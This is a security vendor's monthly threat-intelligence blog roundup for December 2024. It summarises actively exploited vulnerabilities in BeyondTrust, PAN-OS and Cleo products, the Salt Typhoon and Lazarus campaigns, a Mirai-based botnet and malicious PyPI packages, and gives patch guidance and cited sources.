Salt Typhoon Campaign Leads to $3 Billion Plan to Remove Chinese Telecom Equipment

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

Latest Vulnerabilities and Exploits in December 2024

In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.

CVE-2024-12356: CISA Adds BeyondTrust Flaw to KEV Catalog Amid Active Exploitation

• Affected Vendor: BeyondTrust
• Affected Product: Privileged Remote Access (PRA) and Remote Support (RS)
• CVEs & Available Fixes:
  • CVE-2024-12356:
    • PRA: BT24-10-ONPREM1, BT24-10-ONPREM2
    • RS: BT24-10-ONPREM1, BT24-10-ONPREM2
  • CVE-2024-12686:
    • PRA: BT24-11-ONPREM1 to BT24-11-ONPREM7 (version-dependent)
    • RS: BT24-11-ONPREM1 to BT24-11-ONPREM7 (version-dependent)

On December 19, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog. This critical command injection flaw, with a CVSS score of 9.8, affects BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products. It allows unauthenticated attackers to run arbitrary commands as the site user.

Figure 1. CISA added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog. 

CISA cited evidence of active exploitation, urging users of self-hosted software to apply patches (BT24-10-ONPREM1/2) immediately. Cloud instances have already been updated.

This disclosure follows BeyondTrust's confirmation of a recent cyberattack, where threat actors exploited a stolen API key to reset passwords in Remote Support SaaS instances. Another medium-severity vulnerability, CVE-2024-12686, affecting administrative accounts, has also been patched in newer versions. BeyondTrust has notified affected customers.

CISA Adds Palo Alto Networks PAN-OS CVE-2024-3393 to Exploited Vulnerabilities List

• Affected Vendor: Palo Alto Networks
• Affected Product: PAN-OS (DNS Security feature)
• CVE: CVE-2024-3393
• Available Fixes:
  • PAN-OS 10.1.14-h8 and later
  • PAN-OS 10.2.10-h12 and later
  • PAN-OS 11.1.5 and later
  • PAN-OS 11.2.3 and later

On December 30, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation. 

Figure 2. CISA added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog. 

This high-severity denial-of-service (DoS) vulnerability affects Palo Alto Networks' PAN-OS software, specifically the DNS Security feature. An unauthenticated attacker can exploit this flaw by sending a specially crafted packet through the firewall's data plane, causing an unexpected reboot and potentially forcing the firewall into maintenance mode. 

Palo Alto Networks has released patches to address this issue and recommends that affected users apply the updates promptly. CISA has set a remediation deadline of January 20, 2025, for federal agencies to secure their systems against this vulnerability

CVE-2024-55956: CISA Adds Cleo File Upload Vulnerability to KEV Catalog

• Affected Vendor: Cleo
• Affected Products: Cleo Harmony, VLTrader, LexiCom
• CVE: CVE-2024-55956
• Available Fixes:
  • Update to version 5.8.0.24 or later to address the unrestricted file upload vulnerability.
  • Configure the Autorun directory settings to prevent unauthorized file uploads.
  • Monitor systems for unauthorized access or unusual activity.
  • For detailed instructions, refer to Cleo’s security advisory.

On December 17, 2024, CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog. This critical vulnerability affects Cleo Harmony, VLTrader, and LexiCom, managed file transfer products. The flaw allows unauthenticated attackers to exploit unrestricted file upload capabilities, enabling the execution of arbitrary Bash or PowerShell commands on the host system by leveraging the default Autorun directory settings.

Figure 3. CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog. 

CISA highlighted the vulnerability's use in ransomware campaigns, emphasizing its exploitation risk. The agency has set a remediation deadline of January 7, 2025, for federal agencies to secure affected systems.

Cleo has released guidance and mitigations to address the issue. Users are urged to apply the recommended updates or discontinue use if mitigations are unavailable to reduce the risk of exploitation.

Top Threat Actors Observed in the Wild: December 2024

Here are the most active threat actors that have been observed in December in the wild.

Salt Typhoon Breaches 9th U.S. Telecom as Congress Approves ‘Rip and Replace’ Program Bill

• Victim Location: North America (U.S.)
• Sectors: Telecommunications
• Threat Actor: Salt Typhoon (a.k.a Earth Estries, FamousSparrow, GhostEmperor, and UNC2286)
• Actor Motivations: Cyber Espionage
• Malware:
  • CVE (for initial foothold):
  • CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN)
  • CVE-2023-48788 (Fortinet FortiClient EMS)
  • CVE-2022-3236 (Sophos Firewall)
  • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon)

On December 20, 2024, we published the tactics, techniques, and procedures (TTPs) used by the Salt Typhoon APT group to shed light on their sophisticated and stealthy cyber espionage campaigns, particularly targeting the telecommunications sector. Just last week, Salt Typhoon breached its ninth U.S. telecom firm, focusing on unclassified communications and metadata linked to U.S. officials. The White House disclosed this latest victim after federal guidance uncovered critical vulnerabilities exploited in the attack.

US House to Vote on $3 Billion Plan to Remove Chinese Telecom Equipment

Simultaneously, the Federal Communications Commission (FCC) is addressing funding shortfalls for the "Rip and Replace" program to remove insecure Chinese telecom equipment [2]. Estimated at $4.98 billion, the program faces a $3.08 billion gap. Bipartisan support for a defense bill aims to secure $3 billion and additional funds through spectrum auctions. The initiative is critical for safeguarding U.S. networks and rural connectivity, addressing national security risks posed by Chinese infrastructure.

Chinese APT 'Salt Typhoon' Breaches U.S. Treasury via Compromised Remote Support Platform

• Victim Location: United States, North America
• Impacted Sector: Federal Government (U.S. Treasury Department)
• Threat Actor: Salt Typhoon (Chinese state-sponsored APT group)
• Actor Motivations: Cyber espionage, targeting sensitive government data and critical communications
• Exploited CVEs: CVE-2024-12356, CVE-2024-12686 (Zero-day vulnerabilities in BeyondTrust's Remote Support SaaS platform)

On December 8, 2024, the U.S. Treasury Department fell victim to a cybersecurity breach orchestrated by Chinese state-sponsored Advanced Persistent Threat (APT) actors, identified as "Salt Typhoon" [4]. The breach exploited a compromised Remote Support SaaS platform provided by BeyondTrust, a privileged access management company. Attackers leveraged two zero-day vulnerabilities, CVE-2024-12356 and CVE-2024-12686, to reset passwords, gain privileged access, and steal sensitive documents remotely.

BeyondTrust detected the breach, revoked the stolen API key, and shut down all compromised instances. The FBI and CISA conducted an investigation, confirming no further unauthorized access. Salt Typhoon has also been linked to breaches in U.S. telecommunications, prompting CISA to recommend encrypted communication apps, while the U.S. considers banning China Telecom’s operations.

Lazarus Group’s Operation DreamJob Delivers CookiePlus Malware for Defense Evasion

• Victim Location: Nuclear industry organizations, specific location undisclosed
• Sectors: Nuclear, previously Defense, Aerospace, and Cryptocurrency
• Threat Actor: Lazarus Group, linked to North Korea
• Actor Motivation: Espionage, data theft, and potential disruption of critical operations
• Malware: Ranid Downloader, CookiePlus, RustyAttr, and other payloads like MISTPEN, RollMid, LPEClient, Charamel Loader, and ServiceChanger

The Lazarus Group, linked to North Korea, has shifted its focus to the nuclear industry, targeting individuals within nuclear organizations. Previously associated with attacks on defense, aerospace, and cryptocurrency sectors, this marks an alarming escalation in their operations. Using fake job postings under “Operation DreamJob,” they deliver malicious files disguised as job assessments to infiltrate systems. Their arsenal includes sophisticated tools like Ranid Downloader and “CookiePlus,” a memory-resident, plugin-based malware that evades traditional security detection [1]. Recent campaigns also exploit zero-day vulnerabilities and deploy innovative malware like “RustyAttr” on macOS. These developments highlight the urgent need for strengthened cybersecurity in sensitive industries to counteract Lazarus Group's increasingly advanced tactics and persistent threat.

Recent Malware Attacks in December

In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month. 

New Mirai-Based Botnet Exploits RCE Vulnerabilities in DigiEver NVRs and TP-Link Routers

• Victim Location: Global (Primarily targeting devices worldwide)
• Actor Motivations: Distributed Denial-of-Service (DDoS) attacks, propagation to new devices, and potential further exploitation
• Malware: Mirai-based botnet variant
• CVE:
  • CVE-2023-1389 (TP-Link)
  • CVE-2018-17532 (Teltonika RUT9XX)
  • Unpatched RCE in DigiEver DS-2105 Pro NVRs

On December 24, 2024, researchers reported a new Mirai-based botnet actively exploiting vulnerabilities in network video recorders (NVRs) and routers, including DigiEver DS-2105 Pro NVRs, TP-Link devices, and Teltonika RUT9XX routers. The campaign, identified as starting in October 2024, uses unpatched remote code execution (RCE) flaws and known vulnerabilities (CVE-2023-1389, CVE-2018-17532) to compromise devices [5].

The botnet exploits improper input validation in the DigiEver NVRs' /cgi-bin/cgi_main.cgi URI, enabling attackers to inject malicious commands. Compromised devices are enlisted into the botnet through malware binaries and cron jobs, enabling distributed denial-of-service (DDoS) attacks and propagation.

This botnet uses XOR and ChaCha20 encryption, targeting x86, ARM, and MIPS architectures, signaling evolved tactics among Mirai-based threats.

Malicious PyPI Packages 'Zebo' and 'Cometlogger' Stole Data from Hundreds of Downloads

• Victim Location: United States, China, Russia, India (Global impact)
• Sectors: General Public, Developers (via PyPI ecosystem)
• Threat Actor: Unknown (Malware authors leveraging PyPI repository)
• Actor Motivations: Data exfiltration, credential theft, and unauthorized account access
• Malware: Zebo, Cometlogger

Fortinet FortiGuard Labs flagged two malicious Python packages, zebo and cometlogger, uploaded to the Python Package Index (PyPI). Together, these packages were downloaded 282 times—zebo 118 times and cometlogger 164 times—targeting users primarily in the U.S., China, Russia, and India. Both packages have since been removed from PyPI [6].

Zebo acted as spyware, leveraging obfuscation techniques to hide its command-and-control (C2) server. It logged keystrokes using the pynput library, captured hourly screenshots via ImageGrab, and exfiltrated data to ImgBB. Persistence was achieved by adding scripts to the Windows Startup folder.

Cometlogger was more advanced, siphoning credentials, cookies, and tokens from platforms like Discord, Steam, and TikTok. It also harvested system metadata, clipboard content, and network details, bypassed virtualized environments, and terminated browser processes to maximize its reach.

These incidents highlight the risks of interacting with unverified scripts from public repositories, emphasizing the need for careful scrutiny before execution.

References

[1] D. Ahmed, “Lazarus Group Targets Nuclear Industry with CookiePlus Malware,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Dec. 23, 2024. Available: https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/. [Accessed: Dec. 30, 2024]

[2] A. Khaitan, “US House to Vote on $3 Billion Funding for Removal of Chinese Telecom Equipment,” The Cyber Express, Dec. 24, 2024. Available: https://thecyberexpress.com/us-house-to-vote-on-rip-and-replace-program/. [Accessed: Dec. 30, 2024]

[3] “Website.” Available: https://www.wsj.com/politics/national-security/us-ban-china-router-tp-link-systems-7d7507e6

[4] L. Abrams, “US Treasury Department breached through remote support platform,” BleepingComputer, Dec. 30, 2024. Available: https://www.bleepingcomputer.com/news/security/us-treasury-department-breached-through-remote-support-platform/. [Accessed: Jan. 02, 2025]

[5] B. Toulas, “New botnet exploits vulnerabilities in NVRs, TP-Link routers,” BleepingComputer, Dec. 24, 2024. Available: https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/. [Accessed: Jan. 02, 2025]

[6] The Hacker News, “Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts,” The Hacker News, Dec. 24, 2024. Available: https://thehackernews.com/2024/12/researchers-uncover-pypi-packages.html. [Accessed: Jan. 02, 2025]